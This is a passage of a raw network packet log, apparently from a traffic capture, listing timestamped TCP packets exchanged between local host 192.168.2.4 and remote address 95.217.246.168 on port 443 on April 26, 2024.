Apr 26, 2024 11:03:18.537265062 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.584048986 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.584125042 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.584161997 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.584193945 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.584362030 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.584362030 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.643289089 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.643337965 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.643378973 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.643399954 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.643430948 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.643454075 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.696736097 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.696780920 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.696822882 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.696839094 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.696882010 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.697413921 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.740341902 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.740390062 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.740468025 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.740513086 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.740542889 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.740569115 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.781675100 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.781727076 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.781852007 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.781893015 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.781954050 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.815897942 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.815918922 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.816246986 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.816308975 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.816399097 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.845171928 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.845191956 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.845324039 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.845386028 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.845455885 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.870335102 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.870356083 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.870475054 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.870491982 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.870553017 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.894107103 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.894165993 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.894284010 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.894351959 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.894393921 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.894439936 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.920624971 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.920665979 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.920806885 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.920875072 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.920927048 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.920950890 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.942382097 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.942424059 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.942478895 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.942495108 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.942527056 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.942553997 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.964368105 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.964442968 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.964493036 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.964509964 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.964544058 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.964564085 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.983825922 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.983865976 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.983998060 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.983999014 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:18.984059095 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:18.984143972 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.005537987 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.005568027 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.005706072 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.005706072 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.005765915 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.005825996 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.023284912 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.023302078 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.023381948 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.023401976 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.023461103 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.040474892 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.040507078 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.040544987 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.040556908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.040587902 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.040606976 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.059763908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.059777021 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.059861898 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.059873104 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.059927940 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.077096939 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.077130079 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.077213049 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.077224970 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.077284098 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.092334986 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.092350006 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.092530012 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.092540979 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.092603922 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.108966112 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.108989000 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.109082937 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.109093904 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.109147072 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.122791052 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.122818947 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.122915030 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.122931957 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.122989893 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.136857986 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.136873007 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.136972904 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.136986971 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.137051105 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.149581909 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.149596930 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.149792910 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.149805069 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.149863958 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.163549900 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.163563967 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.163649082 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.163666010 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.163722992 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.175120115 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.175132036 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.175215006 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.175226927 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.175283909 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.187288046 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.187309980 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.187410116 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.187422991 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.187485933 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.199894905 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.199913979 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.200004101 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.200030088 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.200083971 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.210335016 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.210352898 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.210417032 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.210429907 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.210481882 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.220622063 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.220638037 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.220690966 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.220704079 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.220741034 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.220741034 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.231497049 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.231522083 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.231597900 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.231628895 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.231688976 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.242192030 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.242209911 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.242268085 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.242285013 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.242341995 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.251390934 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.251406908 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.251471996 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.251482964 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.251533031 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.262104988 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.262123108 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.262185097 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.262197018 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.262248039 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.271331072 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.271343946 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.271428108 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.271440029 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.271491051 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.279758930 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.279772997 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.279838085 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.279848099 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.279903889 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.288127899 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.288141966 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.288209915 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.288222075 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.288268089 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.297552109 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.297565937 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.297626019 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.297636032 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.297688961 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.306071997 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.306085110 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.306145906 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.306155920 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.306207895 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.313754082 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.313767910 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.313868046 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.313886881 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.313935041 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.313968897 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.322321892 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.322335005 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.322386980 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.322407007 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.322439909 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.322458982 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.329873085 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.329886913 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.329955101 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.329965115 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.330004930 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.337537050 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.337549925 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.337608099 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.337619066 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.337656975 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.344892979 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.344907045 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.345005035 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.345015049 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.345060110 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.353004932 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.353017092 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.353085041 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.353096008 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.353138924 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.360769033 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.360785961 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.360852003 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.360863924 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.360925913 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.367831945 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.367844105 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.367930889 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.367942095 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.367954016 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.367980003 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.375195026 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.375209093 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.375283003 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.375293016 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.375333071 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.382280111 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.382292032 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.382359982 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.382369995 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.382411003 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.388897896 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.388911009 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.388978958 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.388988972 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.389029026 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.395865917 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.395878077 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.395942926 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.395953894 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.395994902 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.403110981 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.403125048 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.403198957 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.403208971 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.403249025 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.409229994 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.409241915 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.409305096 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.409315109 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.409327030 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.409357071 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.416706085 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.416718960 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.416786909 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.416796923 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.416837931 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.422885895 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.422900915 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.423005104 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.423015118 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.423083067 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.428981066 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.428992987 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.429088116 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.429097891 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.429137945 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.434643030 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.434654951 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.434726954 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.434737921 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.434779882 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.441122055 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.441135883 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.441199064 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.441209078 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.441247940 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.449014902 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.449028015 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.449062109 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.449071884 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.449090958 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.449126959 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.454304934 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.454318047 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.454384089 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.454394102 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.454433918 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.460728884 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.460748911 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.460815907 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.460825920 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.460867882 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.466483116 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.466495991 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.466573954 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.466584921 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.466623068 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.471745968 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.471757889 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.471827984 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.471838951 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.471879959 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.477031946 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.477049112 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.477157116 CEST	49750	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:19.477168083 CEST	443	49750	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:19.477209091 CEST	49750	443	192.168.2.4	95.217.246.168
